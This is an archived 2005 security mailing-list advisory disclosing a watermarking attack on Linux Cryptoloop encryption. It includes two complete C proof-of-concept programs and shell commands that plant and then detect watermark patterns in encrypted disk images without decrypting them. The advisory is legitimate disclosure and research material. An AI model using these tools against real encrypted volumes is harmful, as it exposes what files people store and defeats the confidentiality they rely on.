From: SecuriTeam <support@securiteam.com.>
To: [email protected]
Date: 26 May 2005 18:02:56 +0200
Subject: [EXPL] Linux Cryptoloop Watermark Exploit
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <20050526160620.8046757BB@mail.tyumen.ru.>
X-Virus-Scanned: antivirus-gw at tyumen.ru
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Linux Cryptoloop Watermark Exploit
------------------------------------------------------------------------
SUMMARY
Cryptoloop "makes it possible to create encrypted file systems within a
partition or another file in the file system. These encrypted files can
the be moved to a CD, DVD, USB memory stick, etc. Cryptoloop makes use of
the loop device. This device is a pseudo-device which serves as a 'loop'
through which each call to a the file system has to pass. This way, data
can be processed in order to encrypt and decrypt it".
Cryptoloop is vulnerable to watermarking, making it possible to determine
presence of watermarked data on the encrypted filesystem.
DETAILS
This attack exploits weakness in IV computation and knowledge of how file
systems place files on disk. This attack works with file systems that have
soft block size of 1024 or greater. At least ext2, ext3, reiserfs and
minix have such property. This attack makes it possible to detect presence
of specially crafted watermarked files, such as, unreleased Hollywood
movies, cruise missile service manuals, and other content that you did not
create yourself. Watermarked files contain special bit patterns that can
be detected without decryption.
For example, to encode author's first name Jari as watermark, we should
use ASCII characters 74 97 114 105. This example uses encodings 10...13.
# mount -t ext2 /dev/fd0 /mnt -o loop=/dev/loop0,encryption=AES128
Password:
# ./create-watermark-encodings 10:74 11:97 12:114 13:105
>/mnt/watermarks
# umount /mnt
And then to detect these watermarks:
# dd if=/dev/fd0 bs=64k | ./detect-watermark-encodings
22+1 records in
22+1 records out
1474560 bytes scanned
watermark encoding 10, count 74
watermark encoding 11, count 97
watermark encoding 12, count 114
watermark encoding 13, count 105
Create watermarks:
/*
* create-watermark-encodings.c
*
* Written by Jari Ruusu, February 10 2004
*
* Copyright 2004 by Jari Ruusu.
* Redistribution of this file is permitted under the GNU GPL
*
* Usage:
* ./create-watermark-encodings encoding:count [encoding:count]...
>filename
*
* Where encoding is a value in range 1...32 and count is number of
* encodings to write. Watermark encoded file contents are written to
* standard output. Each encoding takes up 1024 bytes of disk space.
*
* Example:
* ./create-watermark-encodings 5:123 19:17 23:2 >/home/foo/watermarks
*
* Credits: Markku-Juhani O. Saarinen discovered this exploit.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
unsigned char buf[1024];
char *progName;
void encodeOne(int encoding)
{
memset(buf, 0, sizeof(buf));
buf[512] = 1;
if(encoding < 1) encoding = 1;
if(encoding < 32) {
buf[512 + (encoding * 16)] = 1;
}
}
void writeOne(void)
{
if(fwrite(buf, 1024, 1, stdout) != 1) {
perror("write failed");
exit(1);
}
}
int main(int argc, char **argv)
{
int encoding, y = 0;
unsigned long count, x;
progName = *argv;
if(argc < 2) {
usage:
fprintf(stderr, "usage: %s encoding:count [encoding:count]...
>filename\n", progName);
exit(1);
}
while(--argc > 0) {
if(sscanf(*++argv, "%d:%lu", &encoding, &count) != 2) {
goto usage;
}
for(x = 0; x < count; x++) {
encodeOne(encoding);
writeOne();
y++;
}
}
/* make file size multiple of 4K (to avoid fs tail packing) */
while(y & 3) {
memset(buf, 0, sizeof(buf));
writeOne();
y++;
}
if(fflush(stdout)) {
perror("write failed");
exit(1);
}
exit(0);
}
Detect watermarks:
/*
* detect-watermark-encodings.c
*
* Written by Jari Ruusu, February 10 2004
*
* Copyright 2004 by Jari Ruusu.
* Redistribution of this file is permitted under the GNU GPL
*
* Usage:
* dd if=/dev/hda999 bs=64k | ./detect-watermark-encodings
*
* Program reads encrypted data from standard input and writes human
* readable summary of detected watermark encodings to standard output.
*
* Credits: Markku-Juhani O. Saarinen discovered this exploit.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
unsigned long found[32];
unsigned char buf[1024];
unsigned long long bytes = 0;
int main(int argc, char **argv)
{
int x, y;
memset(found, 0, sizeof(found));
do {
if(fread(buf, 1024, 1, stdin) != 1) break;
bytes += 1024;
y = 0;
do {
/* no encoding if ciphertexts do not match */
if(memcmp(&buf[y] , &buf[y + 512], 16)) break;
/* if ciphertext is same repeated byte, assume */
/* that block was newer written with ciphertext */
for(x = 1; x < 16; x++) {
if(buf[y + x] != buf[y]) break;
}
if(x == 16) break;
/* found watermark encoding */
y += 16;
} while(y < 512);
if(y) {
found[(y >> 4) - 1] += 1;
}
} while(1);
printf("%llu bytes scanned\n", bytes);
y = 1;
for(x = 0; x < 32; x++) {
if(found[x]) {
printf("watermark encoding %d, count %lu\n", x + 1, found[x]);
y = 0;
}
}
if(y) {
printf("no watermark encodings found\n");
}
exit(0);
}
ADDITIONAL INFORMATION
The original article can be found at:
<http://marc.theaimsgroup.com/?l=linux-kernel&m=107719798631935&w=2>
http://marc.theaimsgroup.com/?l=linux-kernel&m=107719798631935&w=2
The information has been provided by <mailto:jariruusu (a) users !
sourceforge ! net> Markku-Juhani O. Saarinen.
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: [email protected]
In order to subscribe to the mailing list, simply forward this email to: [email protected]
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.